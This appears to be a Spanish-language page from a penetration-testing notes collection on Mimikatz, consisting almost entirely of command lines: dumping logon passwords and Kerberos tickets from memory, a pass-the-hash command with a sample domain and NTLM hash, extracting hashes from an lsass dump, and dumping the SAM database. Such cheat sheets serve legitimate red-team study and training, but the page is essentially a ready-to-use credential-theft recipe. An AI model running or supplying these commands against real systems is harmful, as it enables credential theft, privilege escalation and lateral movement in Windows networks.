Mimikatz

Mimikatz es una herramienta que permite extraer contraseñas en texto claro, hash, código PIN y tickets kerberos de la memoria. A su vez, también puede realizar pass-the-hash, pass-the-ticket o construir Golden tickets.

sekurlsa

Mostrar credenciales de usuarios conectados.

mimikatz "sekurlsa::logonpasswords" exit

Extraer tickets de Kerberos de la memoria.

mimikatz "sekurlsa::tickets /export" exit

Pass The Hash

sekurlsa::pth /user:Adminitrator /domain:MARVEL.local /ntlm:f193d757b4d487ab7e5a3743f038f713 /run:cmd

En caso de que tengamos un archivo lsass.dmp podemos dumpear los logonPasswords y ver los hashes NT:

sekurlsa::minidump lsass.DMP
sekurlsa::logonPasswords

Dumpear SAM

lsadump::sam
AnteriorLLMNR PoisoningSiguientePowershell en AD

Última actualización